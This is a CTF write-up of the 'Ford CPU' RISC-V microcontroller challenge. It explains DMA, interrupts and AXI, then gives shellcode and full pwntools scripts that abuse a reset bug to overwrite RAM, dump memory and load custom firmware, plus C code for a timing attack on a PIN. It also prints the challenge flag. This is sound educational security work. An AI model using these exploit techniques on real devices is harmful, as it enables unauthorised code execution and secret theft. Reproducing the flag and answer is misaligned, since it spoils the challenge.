So this is definitely one of the most interesting CTF challenges that I’ve done in a while. I played Chujowy CTF 2020 with redpwn and did this challenge with pepsipu, and this particular challenge took us probably about 15 man-hours of fruitlessly bug-hunting, and 3 hours of actually pwning things.

With that out of the way, what is this challenge?

I really hate the slow transfer rates of UART, so I’ve designed a custom MCU based on the new cool RISC-V ISA which features a parallel port with DMA.

This CPU will revolutionize the automotive industry - can’t wait to install it in my red ford.

Now slow transfers via UART are a thing of the past! I was too lazy to write tests for the DMA controller in this MCU but I’m 100% sure that I didn’t make any bugs there…

And a part 2:

In case someone gains arbitrary code execution on the risc-v core the Ford CPU provides advanced security mechanisms to protect secrets. The flag device reveals secrets only to people who know a secret pin. Can you steal the flag from the flagdevice?

Author: @gorbak25

Alright, we’ve got a RISC-V MCU and a DMA peripheral with some bugs in it. Looks like part 1 involves RCE, and part 2 is attacking another peripheral on the MCU. Unpacking the provided tarball gives us a simulator for the MCU (Vtop), a bunch of Verilog describing all of the hardware, and the sources of the firmware. Judging by the challenge description, we’ll need to be examining the parallel port, which we can find in rtl/axt4_lpt.v. Let’s get going with understanding what all of this does. If you’re familiar with this kind of stuff already, jump right to the first exploit

Intro to Embedded#

We’re working in an embedded environment here, so a lot of the usual tips and tricks for pwning Linux binaries don’t apply. We have a very minimal libc (newlib), no kernel to syscall into, and in this case, also no memory protections whatsoever. One thing I immediately noticed looking through the firmware sources was that the built firmware was named ram.elf—this MCU has RAM only, no ROM, and so the firmware is in (writable) RAM. On board an MCU, we also have a lot of hardware devices that the core (the RISC-V CPU executing our firmware code) can interact with; it’s much like expansion cards on the PCI bus on a standard x86 computer. As is typical with MCUs, everything the CPU can access shares the same address space; interacting with a peripheral is done by writing to or reading from a memory address.

All of the Verilog files (in rtl/) describe these hardware peripherals; there’s also the actual RISC-V CPU itself, which is a PicoRV32 core, located at picorv32/picorv32.v. While the Verilog might look like code for a program at first, it is actually a description of hardware; Verilog is a Hardware Description Language (HDL). And, taking a peek at the build process in build.sh, we can see that a tool called Verilator is used to turn all of this Verilog into C++ code to run the simulation. However, for all intents and purposes, the Verilog is still describing hardware; it just happens to be simulated in software.

To recap so far: we’ve got a RISC-V core which runs our firmware, and along side it in our simulated hardware, we have some peripherals. Now let’s take a look at the parallel port that we’ll be attacking. In our firmware source, we can see that our core interacts with it by doing memory reads and writes as we discussed before. For example, to send an aligned amount of data through the parallel port, we have this code:

void fast_send(char* str, int size) {
    while (!tx_done);
    tx_done = 0;
    REG32(LPT_REG_TX_BUFFER_START) = (uint32_t)str;
    REG32(LPT_REG_TX_BUFFER_END) = (uint32_t)str + size;
}

Let’s break this down step-by-step. First, we check the tx_done flag, which is a boolean indicating whether or not we’re done transmitting. Notice that we have a while loop that isn’t actually doing anything to update its condition; we’ll come back to this later. Next, we set tx_done to 0, signaling that there is a transmit in progress. Finally, we write to two registers in the parallel port (LPT), telling it where the start and end of our buffer is. Notice we’re not actually sending any of our data directly to the LPT; how is it being sent?

To answer that, we’ll need to hop over to the hardware of the LPT itself. Looking at axi4_lpt.v, we see a section labeled “Control registers” with some registers with names that match up with the registers we accessed from the C code in the firmware:

/// Control registers.

// Master state.
reg [31:0] ctrl_state = 32'b0;
wire       ctrl_state_enable_rx           = ctrl_state[0];
wire       ctrl_state_enable_tx           = ctrl_state[1];

// RX ring buffer controls.
reg [31:0] ctrl_rx_buffer_start_ptr = 32'b0;
reg [31:0] ctrl_rx_buffer_end_ptr   = 32'b0;
reg [31:0] ctrl_rx_buffer_rx_ptr    = 32'b0;
reg rx_done;

// TX ring buffer controls.
reg [31:0] ctrl_tx_buffer_start_ptr = 32'b0;
reg [31:0] ctrl_tx_buffer_end_ptr   = 32'b0;

For now, we can just treat how the values get in to those registers as a black box and look at the interesting part, how our data gets sent. Searching for references to those registers will lead us to this:

// Read from RAM using DMA - send the read result to the serial port
always @(posedge clk) begin
    lpt_out_valid_latch <= 0;
    tx_done <= 0;
    if (!resetn) begin
        axi_master_araddr <= 32'b0;
        axi_master_arvalid <= 0;
        axi_master_rready <= 0;
        tx_latch <= 0;
    end else begin
        if (lpt_out_ready && ctrl_state_enable_tx && ctrl_tx_buffer_start_ptr != ctrl_tx_buffer_end_ptr & axi_master_r_idle) begin
            axi_master_arvalid <= 1;
            axi_master_araddr <= ctrl_tx_buffer_start_ptr;
            axi_master_rready <= 1;
        end else begin
            if (axi_master_arvalid & axi_master_arready) begin
                axi_master_arvalid <= 0;
            end
            if (axi_master_rvalid & axi_master_rready) begin
                axi_master_rready <= 0;
                tx_latch <= axi_master_rdata;
                lpt_out_valid_latch <= 1;
                ctrl_tx_buffer_start_ptr <= ctrl_tx_buffer_start_ptr + 4;
                tx_done <= (ctrl_tx_buffer_start_ptr + 4) == ctrl_tx_buffer_end_ptr;
            end
        end
    end
end

This is a lot to take in at once, but as the comment tells us, what’s happening here is that our peripheral is itself reading from RAM using DMA—direct memory access.

DMA#

Essentially all that DMA means is that instead of responding to requests on the memory bus (like how it responds to the core writing to one of its registers), the peripheral is also able to initiate memory access. In our LPT, it’s reading out of the RAM addresses we gave it to send our data out the parallel port—and it’s doing this in hardware, without the core needing to do anything! Remember, all our core needed to do was to tell the LPT where the data we wanted to send was. Our fast_send function then immediately returned—because the core doesn’t need to do anything else; it’s all handled by the LPT’s hardware. We will go into more details about the memory bus later.

Let’s compare this to a non-DMA peripheral, the UART. Looking at our firmware source again, we see that we send data to UART via a simple printf call:

// Print welcome message via UART
printf("Booting the HardHardFlag MCU :D\n");
printf("This MCU is running a picorv32 core which I've got from github\n");
printf("It must be 100 percent secure.\n");
printf("I added some peripherals to it via the AXI4 bus xD\n");
printf("I hated the slow transfer rates of UART.\n");
printf("So I've added a parallel port with DMA to it to make it faster xD\n");
printf("TERMINATING SLOW UART - TIME FOR 1337 DMA xD\n");

How does that work? We’ll need to go take a look at Newlib, the embedded C standard library of choice.

Newlib#

Newlib is a C standard library that’s designed to be run on embedded microcontrollers without a kernel, so it needs some special effort from the developer to get all of its functions working. Newlib uses a so-called “Board Support Package” (BSP), which essentially is a definition of some of the basic Unix system calls. We can see this in firmware/src/bsp.c:

// Board Support Package for newlib

#include <sys/stat.h>
#include <sys/errno.h>

#include "soc.h"

// ...

// Write to UART.
int _write(int file, char *ptr, int len) {
    for (int i = 0; i < len; i++) {
        REG32(UART_REG_DOUT) = *ptr++;
    }
    return len;
}

// ...

I’ve omitted all of the other system calls for brevity, since we just want to look at how printf works. So we see that by defining _write (write(2)) to write to our UART peripheral, Newlib takes care of making printf work!

Now let’s look a little more closely at what this write function is doing. We loop over every byte in the string to write, and send it to a register—UART_REG_DOUT. In the real world, this is how most IO peripherals on MCUs work—they have a register where you write a word of data to send (with the word size being defined by the particular communication protocol / bus that peripheral is dealing with—for almost everything this is 8 bits), and a similar register where you read the next incoming word. Notice that our core essentially needs to babysit the peripheral while this is happening. In the real world, we would usually also need to wait for the peripheral to become ready again before sending the next byte, but in this challenge the UART actually locks up the memory bus while waiting for data to send. Thus, our memory write instruction will wait (for potentially quite a while!) until the UART can actually send the byte. This results in the transmit delay being transparent in the code, at the cost of our firmware not being able to do anything about the fact that this write might end up taking many, many more clock cycles than expected. Either way, while we are transferring these bytes, our core can’t be executing other code.

Contrast this with DMA, where all we needed to do was to tell the peripheral where the memory we wanted to send was; after doing that, our core is free to go do something else. As the challenge description hints towards, DMA is a great way to speed things up in an MCU; this is because we have separate hardware doing the tedious task of copying memory around for us, and the core can go do other important work in the meantime.

A quick note on the real world again: typically peripherals do not do their own DMA like our LPT in this challenge does. Usually, there is a separate DMA peripheral whose job is only to copy memory from one place on the bus to another, triggered by an interrupt. Looking at how our UART works, it’s pretty easy to see how a dedicated DMA device would function: it would copy data from our memory into the DOUT register every time the UART finishes transmitting a word. This way, a single DMA controller can service basically all of the peripherals on board an MCU, and chip designers can save on silicon by not duplicating this DMA functionality.

Interrupts#

Now let’s get back to that magical-seeming tx_done flag—how does it get updated? If we follow it in the firmware code, we see that it gets set by this function:

static void irq_lpt_tx_done(void) {
  tx_done = 1;
}

And where does that function get called? Well, it’s put into a handler table:

static irq_handler irq_handlers[32] = {
    [IRQ_LPT_TX_DONE] = irq_lpt_tx_done,
    [IRQ_LPT_RX_FULL] = irq_lpt_rx_full,
    [IRQ_LPT_RX_DONE] = irq_lpt_rx_done
};

This obscure little bit of C syntax essentially defines the index in the array at which we are putting each value of our array initializer—expect to see a lot of C code like this when working with embedded systems (embedded programmers love using C language features to be able to express certain things symbolically through pure C—registers are often defined as members of a struct for example).

So as I’ve hinted to, this function is an interrupt handler that gets called when an interrupt is generated. On any CPU, many things can generate interrupts, and when one is raised (an Interrupt ReQuest—IRQ), the CPU stops whatever it’s currently doing to respond by calling into an Interrupt Service Routine (ISR). As we see here, the LPT generates a few interrupts that our firmware then reacts to—by setting flags such as tx_done or even doing all command processing for input.

Let’s head back over to the Verilog to see how they’re generated. Looking at axi4_lpt.v again we see the IRQs declared:

// IRQ
output irq_rx_done, // Generate interupt if the last received byte is a nullbyte
output irq_rx_full,
output irq_tx_done

…and then set:

assign irq_tx_done = ctrl_state_enable_tx & tx_done;

So, we can see that our interrupt is raised whenever our transmission is completed; just what we expected from reading the firmware!

AXI#

Last is a quick primer on AXI, the Advanced eXtensible Interface. This isn’t really necessary for understanding the exploit, but knowing how AXI works helps to clarify exactly how the peripherals interact with the memory bus.

AXI is a common memory bus used in many different architectures of MCUs; it was originally designed by ARM, but as we can see, there’s nothing stopping us from using it in a RISC-V MCU. Like all memory buses, AXI is based on a master-slave structure—the master initiates a memory transaction (either a read or a write), and the slave responds. The slew of registers at the beginning of the LPT’s module definition declare all of the interface lines for both the master and the slave side of the LPT. Remember, the core reads and writes to the control registers of the LPT to, well, control it; therefore, the LPT needs to be a slave on the AXI bus. But, the LPT also needs to initiate memory operations for DMA, so it has a separate master, also on the AXI bus.

To perform a read or a write, the master sends the address down the relevant a*addr line (awaddr for a write and araddr for a read). The slave needs to then save this address somewhere, because by the time the read or write is actually executed, the master isn’t required to keep the a*addr lines driven with the address any more. This temporary storage is what all of the latched_* registers in the Verilog are for. Similarly, the slave needs to save the data being written (wdata). The timings are governed by a handshaking protocol as well.

There are many more advanced features of the AXI bus that the LPT does not implement, and although they’re certainly interesting if you’re into chip design, they’re not relevant to this CTF challenge.

Now with all of that background out of the way, let’s get into discovering the actual exploit.

Stage 1: DMA#

If you want to skip right to the exploit itself, click here.

Remember, our goal is to get code execution. So, we can assume that we’re probably looking for some out of bounds write from the DMA functionality in the LPT. Let’s read over how the RX end of the LPT works, starting with the firmware:

// Enable RX & TX for parallel port
REG32(LPT_REG_RX_BUFFER_START) = cmd;
REG32(LPT_REG_RX_BUFFER_END) = cmd + 256;
REG32(LPT_REG_STATE) = 2 | 1;

So we give the LPT a buffer in globals to write into, and set its state register to enable both RX and TX. Now let’s hop over to the hardware side to see how our received data ends up in the buffer:

wire axi_master_w_idle = !axi_master_awvalid & !axi_master_wvalid & !axi_master_bvalid;
wire space_left = ((ctrl_rx_buffer_end_ptr - ctrl_rx_buffer_rx_ptr - 4) >= 0);
wire fifo_rx = ctrl_state_enable_rx & axi_master_w_idle & lpt_in_valid & space_left & (!rx_done);

// Read from FIFO and make DMA write to RAM
always @(posedge clk) begin
    rx_done_irq <= 0;
    terminator <= 0;
    if (!resetn) begin
        latched_rx <= 32'b0;
        latched_waddr <= 32'b0;
        send <= 0;
        rx_done <= 0;

        axi_master_awvalid <= 0;
        axi_master_awaddr <= 32'b0;
        axi_master_awprot <= 3'b0;
        axi_master_wvalid <= 0;
        axi_master_wstrb <= 4'b0;
        axi_master_wdata <= 32'b0;
        axi_master_wstrb <= 4'b0;
        axi_master_bready <= 0;
    end else begin
        if (fifo_rx) begin
            if (lpt_in_data == 32'h0a0a0a0a) begin
                terminator <= 1;
                rx_done <= 1;
            end else begin
                latched_rx <= lpt_in_data;
                latched_waddr <= ctrl_rx_buffer_rx_ptr;
                send <= 1;
            end
        end

        if (send & axi_master_w_idle) begin
            axi_master_awaddr <= latched_waddr;
            axi_master_awvalid <= 1;
            axi_master_wvalid <= 1;
            axi_master_wdata <= latched_rx;
            axi_master_wstrb <= 4'b1111;
            axi_master_bready <= 1;

            ctrl_rx_buffer_rx_ptr <= ctrl_rx_buffer_rx_ptr + 4;
            rx_done <= (ctrl_rx_buffer_rx_ptr + 4) == ctrl_rx_buffer_end_ptr;
            rx_done_irq <= (ctrl_rx_buffer_rx_ptr + 4) == ctrl_rx_buffer_end_ptr;
            send <= 0;
        end else begin
            if (axi_master_awvalid & axi_master_awready) begin
                axi_master_awvalid <= 0;
            end
            if (axi_master_wvalid & axi_master_wready) begin
                axi_master_wvalid <= 0;
            end
            if (axi_master_bvalid & axi_master_bready) begin
                axi_master_bready <= 0;
            end
        end
    end
end

It’s mostly boring bookkeeping related to the AXI bus, but this is the interesting part:

axi_master_awaddr <= latched_waddr;
axi_master_awvalid <= 1;
axi_master_wvalid <= 1;
axi_master_wdata <= latched_rx;
axi_master_wstrb <= 4'b1111;
axi_master_bready <= 1;

ctrl_rx_buffer_rx_ptr <= ctrl_rx_buffer_rx_ptr + 4;
rx_done <= (ctrl_rx_buffer_rx_ptr + 4) == ctrl_rx_buffer_end_ptr;
rx_done_irq <= (ctrl_rx_buffer_rx_ptr + 4) == ctrl_rx_buffer_end_ptr;
send <= 0;

We write our received data to latched_waddr, which is the value of ctrl_rx_buffer_rx_ptr at the time when we received the incoming data. Then we move ctrl_rx_buffer_rx_ptr forward by 4 bytes (this is a 4-byte-wide parallel port), and say that we’re done if our pointer will end up equaling ctrl_rx_buffer_end_ptr.

First, a quick note on Verilog: the <= operator is a delayed assignment operator, whose effects take place after the always block it’s enclosed in. We initially thought that there would be some bugs related to this behavior, but ultimately everything was safe. We also notice that if we can get ctrl_rx_buffer_end_ptr to be misaligned, then our DMA will never stop receiving. By itself, this bug isn’t able to accomplish much, but it is functionality that will come in handy later. Another bug we found was in the comparison for space_left. Running verilator --lint-only -Wall rtl/axi4_lpt.v revealed that this was an unsigned comparison which always evaluated to true:

%Warning-UNSIGNED: rtl/axi4_lpt.v:183:73: Comparison is constant due to unsigned arithmetic
                                        : ... In instance axi4_lpt
  183 | wire space_left = ((ctrl_rx_buffer_end_ptr - ctrl_rx_buffer_rx_ptr - 4) >= 0);
      |                                                                         ^~

Again, not very useful right now, but it comes in handy later.

So, it seems like, under normal circumstances, our DMA read is safe, however we’re on the lookout for ways to screw with the ctrl_rx_buffer_rx_ptr and ctrl_rx_buffer_end_ptr in order to get an unbounded write.

This seems like a bit of a dead end, so let’s go look at the firmware some more. We see that the bulk of the logic happens in the interrupt handler for irq_rx_done, including accepting a EULA (looks like we can never escape from those things). Fiddling around with the simulator gave some confusing results though; at first, we were unable to get the MCU to do anything in response to our commands. Since we know command processing gets triggered by irq_rx_done, let’s trace how that gets fired. Hopping back over to Verilog, we see this:

// Route IRQ
reg tx_done;
assign irq_rx_done = ctrl_state_enable_rx & terminator;
assign irq_rx_full = ctrl_state_enable_rx & rx_done_irq & !terminator;
assign irq_tx_done = ctrl_state_enable_tx & tx_done;

So irq_rx_done is raised whenever terminator is raised. Where does that happen?

if (lpt_in_data == 32'h0a0a0a0a) begin
  terminator <= 1;
  rx_done <= 1;
end

It seems our input has to be 4 newlines (0a0a0a0a) in order for the done interrupt to be triggered. Although bizarre, in a way it still makes sense, since we have a 4 byte wide parallel port; it’s natural for it to need things aligned to 4 bytes. So, we make a note that we can raise irq_rx_done by sending an aligned set of 4 newlines (which drops those 4 newlines), and continue with our analysis.

After quite a lot of time spent with little progress, pepsipu noted that we must have been given the ability to reset the MCU for a reason:

if(tries == 2) {
    // Send trap so the simulator reboots the CPU
    tries = 0;
    flag_mode = 0;
    eula_accepted = 0;
    __asm__ __volatile__ ("ebreak");
}

Alright, so how does the reset process work? To answer that, we actually need to go look at the simulator’s source code (in the top-level main.cpp):

if (top->trap) {
    // Reset on CPU failure.
    fprintf(stdout, "resetting...\n");
    top->resetn = 0;
    c(10);
    top->resetn = 1;
}

c is a function that ticks the MCU for the requested number of clock cycles. So we see that on reset, resetn goes low for 10 clock cycles, and then is set high again. Let’s see what that does in our LPT. Remember, we’re looking for ways to get the LPT to write out of bounds.

if (!resetn) begin
    ctrl_rx_buffer_start_ptr <= 32'b0;
    ctrl_rx_buffer_end_ptr <= 32'b0;
    ctrl_rx_buffer_rx_ptr <= 32'b0;

    ctrl_tx_buffer_start_ptr <= 32'b0;
    ctrl_tx_buffer_end_ptr <= 32'b0;
end

So our rx and end pointer are both set to address 0… if we recall the bounds check, the LPT only cares about what rx_ptr is after we increment. So, if we can get the LPT to start reading in this state, we have an unbounded write to RAM starting at address 0!

Now we just need to check what conditions need to be met for the LPT to start doing DMA RX. It’s controlled by the fifo_rx wire we saw earlier:

wire fifo_rx = ctrl_state_enable_rx & axi_master_w_idle & lpt_in_valid & space_left & (!rx_done);

We see that rx_done is cleared on reset:

if (!resetn) begin
    latched_rx <= 32'b0;
    latched_waddr <= 32'b0;
    send <= 0;
    rx_done <= 0;

    axi_master_awvalid <= 0;
    // ...
end

We already established space_left is always high, so that just leaves ctrl_state_enable_rx. That is defined as the low bit of ctrl_state:

reg [31:0] ctrl_state = 32'b0;
wire       ctrl_state_enable_rx           = ctrl_state[0];
wire       ctrl_state_enable_tx           = ctrl_state[1];

…which if we trace through the Verilog, is never cleared on reset! This means ctrl_state (and by extension, ctrl_state_enable_rx) are kept as whatever they were before the MCU reset—which is the enabled state!

Dumping the firmware#

To summarize, on reset we are able to write whatever we want to RAM starting from address 0. This is the entrypoint for our RISC-V core, which normally contains a jump to _start. But we can repurpose this space to do some evil things.

The first thing we tried doing was writing a jump into our buffer where our input gets placed under normal execution, so that we have more space to work with (the interrupt handler is located at address 0x10). We got as far as locally working exploits only to discover that, since the fake flag in the C code was replaced with the (longer) real flag, the offset of that buffer was different on the server’s firmware than on the firmware we were provided. So instead we changed tack and decided to cram our shellcode in those first 16 bytes, and to abuse the LPT’s TX DMA to dump all of RAM.

To pull this off, we need to reset the MCU, and then write our shellcode in (at address 0) before the MCU’s firmware starts up and writes to the control register. This is because as soon as the master state register is written to:

// Enable TX for parallel port
REG32(LPT_REG_STATE) = 2;

…our RX mode will be turned off. Thankfully, the MCU spends a lot of CPU cycles slowly printing a message using the UART and then waiting:

// Wait some time for the UART to be send to the user
for(int i = 0; i<20000; i++);

…which gives us the time to load our shellcode.

Now, what’s our shellcode? It turns out, the TX of the LPT has a very similar issue with its bounds check, which means that a misaligned end will result in the LPT never stopping transmission:

axi_master_rready <= 0;
tx_latch <= axi_master_rdata;
lpt_out_valid_latch <= 1;
ctrl_tx_buffer_start_ptr <= ctrl_tx_buffer_start_ptr + 4;
tx_done <= (ctrl_tx_buffer_start_ptr + 4) == ctrl_tx_buffer_end_ptr;

The LPT will transmit for as long as its start_ptr is not exactly equal to its end_ptr, and it has transmission enabled. TX was previously enabled by the firmware before reset, and is not cleared by the reset, and start_ptr is set to 0 on reset, so all we need to get the LPT dumping memory is to nudge the end_ptr. Finally, we want to enter an infinite loop so that our LPT has time to dump all of our RAM. This is our shellcode, which we then assembled with GNU as (riscv32-elf-as):

  li x1, 0xf0010000
  li x2, 1
  sw x2, 0x14(x1)
loop:
  j loop

To exploit, all we need to do is send this immediately after we trigger the reset, which will load our shellcode at address 0. However, this happens after the core has executed the code at address 0, and so the MCU is running the normal firmware again. This is why it’s important not to clobber the interrupt handler—otherwise, the firmware wouldn’t function because our shellcode is interfering with it, and prevent us from doing a second reset. Using the reset functionality again, we get the MCU to restart execution at address 0 and run our shellcode, at which point we can then save all the memory that’s being dumped.

In hindsight, we could have also put our shellcode in the interrupt handler, but it was so small that it fit under the interrupt handler anyways.

#!/usr/bin/env python3
from pwn import *
import subprocess
import shlex
import math

if args.REMOTE:
    p = remote('ford-cpu.chujowyc.tf', 4001)
    with log.progress('Doing POW'):
        p.recvuntil('output of:\n')
        hashcash_cmd = p.recvline().decode()
        hashcash = subprocess.run(shlex.split(hashcash_cmd), stdout=subprocess.PIPE)
        hashcash_stamp = hashcash.stdout.decode().replace('hashcash stamp: ', '').strip()
        p.sendlineafter('hashcash stamp:', hashcash_stamp)
else:
    p = process('./Vtop')

def d_send(s: bytes):
    # pad out to 4 byte aligned
    s_len = math.ceil(len(s) / 4) * 4
    s = s.ljust(s_len, b'\0')
    p.send(s)

def fw_send(s: bytes):
    d_send(s)
    p.send(b'\n'*4)

def fw_goto_prompt():
    with log.progress('Waiting for prompt'):
        p.recvuntil(b'xD xD XD Can you PWN my DMA controller? xD xD XD\n')

def fw_enter_flag_cmp():
    with log.progress('Entering flag compare mode'):
        fw_send(b'ack\n')
        p.recvuntil(b'OK\n')
        fw_send(b'cmp\n')
        p.recvuntil(b'Now you have 3 tries to guess the flag\n')

SHELLCODE = (
    p32(0xf00100b7) +  # lui  ra,0xf0010
    p16(0x4105    ) +  # li   sp,1
    p32(0x0020aa23) +  # sw   sp,20(ra)
    p16(0x2001    )    # j    -0 # infinite loop
)

fw_goto_prompt()
fw_enter_flag_cmp()
with log.progress('resetting'):
    [(fw_send(b'bruh'), p.recvuntil(b'INVALID FLAG\n')) for _ in range(2)]
    fw_send(b'bruh')

d_send(SHELLCODE)

fw_goto_prompt()
fw_enter_flag_cmp()
with log.progress('resetting'):
    [(fw_send(b'bruh'), p.recvuntil(b'INVALID FLAG\n')) for _ in range(2)]
    fw_send(b'bruh')

p.recvuntil(b'resetting...\n')

with log.progress('Dumping'):
    caddr = 0
    with open('dump.bin', 'wb') as fd:
        while caddr < 0x10000:
            recvd = p.recv(4096)
            fd.write(recvd)
            caddr += len(recvd)

This will create dump.bin containing all of the RAM of the MCU—open it up with radare and look for the flag.

[0x00000000]> / chCTF
Searching 5 bytes in [0x0-0x10650]
hits: 1
0x00009340 hit0_0 .lid commandchCTF{Pr0P3R_r353771n.
[0x00000000]> s hit0_0
[0x00009340]> ps
chCTF{Pr0P3R_r353771n9_15_V3rY_H4RD}

We also looked for our dummy text that we entered into the buffer (bruh) and found that our cmd buffer is at a different address on the server’s firmware than the one we were provided; that makes sense, since the real flag is much longer than the fake flag in the source code for the firmware we were given. This also explains why our other exploit attempt at jumping into cmd failed. But, now we have the exact offset so we can reliably use cmd for stage 2 of this challenge.

Stage 2: Timing attack#

The next challenge involved getting a flag out of a hardware device that is PIN-protected. Looking at its source in Verilog reveals the world’s most obvious timing attack:

// PIN checking
always @(posedge clk) begin
    if (device_status) begin
        delay <= delay + 1;
        if (delay == 8'hff) begin
            if (pin_bytes[ctr] == correct_pin[ctr]) begin
                ctr <= ctr + 1;
                if(ctr == 4'hf) begin
                    device_status <= 0;
                    pin_status <= 1;
                end
            end else begin
                device_status <= 0;
                pin_status <= 0;
            end
        end
    end
end

We see that it is artificially waiting 256 clock cycles between each byte-by-byte compare of the inputted PIN to the correct pin. Also, the device’s status is immediately reset as soon as one of the bytes is wrong. Thus, we can do a byte-by-byte bruteforce of the PIN.

Since the timing attack is on the order of a few hundred clock cycles, it’s clear we need to execute the attack on the MCU itself. I don’t like coding in assembly, particularly with an architecture I’m not very familiar with, so I decided to attempt to load our own custom firmware on the MCU using the attack from the last stage. The firmware itself is just the firmware source that we were given, except I removed newlib (it’s big and we won’t be needing it) and modified its startup. But first, we still need to load this firmware into RAM.

Firmware Loading#

This is where knowing the address of cmd comes in handy. Since the MCU will still be executing code while we are loading our new firmware (starting at address 0!), we need it to be executing code at a region in memory far away from the firmware so that we don’t accidentally start running our new firmware before it’s fully loaded. So, we can place a spinloop in our buffer (which is very high up in memory, since it’s a global variable in the .bss section), and safely overwrite the firmware from under it. But, since we’re in this spinloop, we no longer have a way of resetting the MCU; we’ll need another way of redirecting execution back into the firmware that does not require a reset. Fortunately, we can generate an interrupt from our input by sending 4 newlines. The interrupt will cause a jump to the interrupt handler at address 0x10, which is in our new firmware. Thus, we can start execution of our new firmware by triggering irq_rx_done!

There’s just one catch to this plan—we no longer have a working interrupt handler in our new firmware because we use it to jump to _start. To remedy this, I placed another jump to the normal interrupt handler after the jump to _start:

/* irq handler */
.global _irq_handler
.org 0x00000010
_irq_handler:
    j _start
    j _irq

…followed by the code of main() immediately nop’ing out the j _start:

void main() {
    *(uint16_t*)_irq_handler = 0x0001; // nop
    // ...
}

This also requires one small adjustment to our shellcode—upon reset, the PicoRV32 masks all interrupts, which means all interrupts will be ignored. Thus, our shellcode needs to also unmask them before spinlooping.

Now we just need to script the actual loading process. The Makefile from the firmware build outputs a .bin file which contains the raw memory of our newly-built firmware, so we can use that in our script:

#!/usr/bin/env python3
from pwn import *
import subprocess
import shlex
import math
from binascii import hexlify
from pwnlib.util.packing import pack

if args.REMOTE:
    p = remote('ford-cpu.chujowyc.tf', 4001)
    with log.progress('Doing POW'):
        p.recvuntil('output of:\n')
        hashcash_cmd = p.recvline().decode()
        hashcash = subprocess.run(shlex.split(hashcash_cmd), stdout=subprocess.PIPE)
        hashcash_stamp = hashcash.stdout.decode().replace('hashcash stamp: ', '').strip()
        p.sendlineafter('hashcash stamp:', hashcash_stamp)
    CMD_ADDR = 0xe9ac
else:
    p = process('./Vtop')
    CMD_ADDR = 0xe994


# RISC V utils

def int2bitlist(number, size=32):
    result_bytes = pack(number, size, endianness='little')
    result = [bool(result_bytes[i // 8] & (1 << (i % 8))) for i in range(size)]
    return result


def bitlist2int(bits):
    return sum(2 ** i for i, v in enumerate(bits) if v)


def generate_jump(addr, target):
    """
    Assemble `j` to target (relative)
    """
    offs = target - addr
    offs_bits = int2bitlist(offs, size=21)
    opcode = int2bitlist(0x6f, size=32)  # jal x0
    opcode[12:32] = [
        offs_bits[i]
        for i in [12, 13, 14, 15, 16, 17, 18, 19, 11, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 20]
    ]
    return bitlist2int(opcode)


# MCU interaction utils

def d_send(s: bytes, interrupt=False):
    s_len = math.ceil(len(s) / 4) * 4
    s = s.ljust(s_len, b'\0')
    p.send(s)
    if interrupt:
        p.send(b'\n'*4)

def fw_send(s: bytes):
    d_send(s, interrupt=True)

def fw_goto_prompt():
    with log.progress('Waiting for prompt'):
        p.recvuntil(b'xD xD XD Can you PWN my DMA controller? xD xD XD\n')

def fw_enter_flag_cmp():
    with log.progress('Entering flag compare mode'):
        fw_send(b'ack\n')
        p.recvuntil(b'OK\n')
        fw_send(b'cmp\n')
        p.recvuntil(b'Now you have 3 tries to guess the flag\n')

# jump to cmd
JUMP_TO_CMD_FROM_0 = p32(generate_jump(0, CMD_ADDR))

SHELLCODE = (
    p32(0x0600600b) +  # maskirq zero,zero
    p32(0x2001    )    # j       -0 # infinite loop
)

NEW_FW = bytes()
with open('./new-fw.bin', 'rb') as fd:
    NEW_FW = fd.read()

fw_goto_prompt()
fw_enter_flag_cmp()
with log.progress('Resetting'):
    [(fw_send(b'bruh'), p.recvuntil(b'INVALID FLAG\n')) for _ in range(2)]
    fw_send(b'bruh')

p.send(JUMP_TO_CMD_FROM_0)

fw_goto_prompt()
fw_enter_flag_cmp()
with log.progress('Resetting'):
    [(fw_send(SHELLCODE), p.recvuntil(b'INVALID FLAG\n')) for _ in range(2)]
    fw_send(SHELLCODE)
    p.recvuntil(b'resetting...\n')

with log.progress('Loading new FW'):
    d_send(NEW_FW, interrupt=True)

p.interactive()

As you might be able to see, a lot of it was copied from the previous stage, and we added a utility to create jump instructions (…which is a process that took pepsipu and I the better part of an hour to do).

With firmware loading out of the way, we have a completely normal firmware where we can do whatever we want!

So, the next step is of course to implement the timing attack:

#include "soc.h"
#include "irq.h"

void uart_write(const char* ptr, int len) {
    for (int i = 0; i < len; i++) {
        REG32(UART_REG_DOUT) = *ptr++;
    }
}

char fd_flag[16] = {};

void read_flag() {
    for (uint32_t i = 0; i < sizeof(fd_flag); i += 4) {
        *(uint32_t*)(fd_flag + i) = REG32(FLAG_DEV_FLAG_START + i);
    }
}

char fd_pin[16] = {0};

void write_pin() {
    for (uint32_t i = 0; i < sizeof(fd_pin); i += 4) {
        REG32(FLAG_DEV_PIN + i) = *(uint32_t*)(fd_pin + i);
    }
}

int time_pin() {
    write_pin();
    int counter = 0;
    /* BEGIN CRITICAL SECTION */
    REG32(FLAG_DEV_CHECK_START) = 1;
    for (; REG32(FLAG_DEV_DEVICE_STATUS); ++counter);
    /* END CRITICAL SECTION */
    return counter;
}

void do_attack() {
    int prev_pin_byte = 0, curr_pin_byte = 0;
    int succeeded = 0;
    while (!succeeded && curr_pin_byte < sizeof(fd_pin)) {
        curr_pin_byte = ((time_pin() + 1) / 6) - 1;
        if (!(curr_pin_byte > prev_pin_byte)) {
            // The current byte is wrong
            ++fd_pin[curr_pin_byte];
        } else {
            if (curr_pin_byte < prev_pin_byte) {
                uart_write("REGRESSION\n", 11);
            }
            prev_pin_byte = curr_pin_byte;
        }
        succeeded = REG32(FLAG_DEV_PIN_STATUS);
    }
}

const char STARTUP_MESSAGE[] = "Firmware booted\n";

void main() {
    *(uint16_t*)_irq_handler = 0x0001; // nop
    uart_write(STARTUP_MESSAGE, sizeof(STARTUP_MESSAGE) - 1);
    do_attack();
    read_flag();
    uart_write(fd_flag, 16);
    uart_write("\n", 1);
    for (;;);
}

// ...and some more ISR stuff that wasn't used

When writing the code that interfaced with the FlagDevice, I made sure to only use aligned 32 bit memory accesses; it shouldn’t be needed for the reads, but is necessary for the writes. This is because to perform writes smaller than one word, the AXI bus uses a strobe for specifying which bytes out of the 32 bit wide bus are valid; however, the FlagDevice ignores the WSTRB line, so it only works with writes that are a full 32 bytes.

Our new firmware can be run using both the normal load process of the simulator (copying the built ram.hex file to firmware.hex in the working directory of Vtop) or through our loader script—being able to run in the simulator directly saves us having to wait for the loader to run while debugging.

Running this against remote gave us the flag.

❯ ./fw-replace.py REMOTE
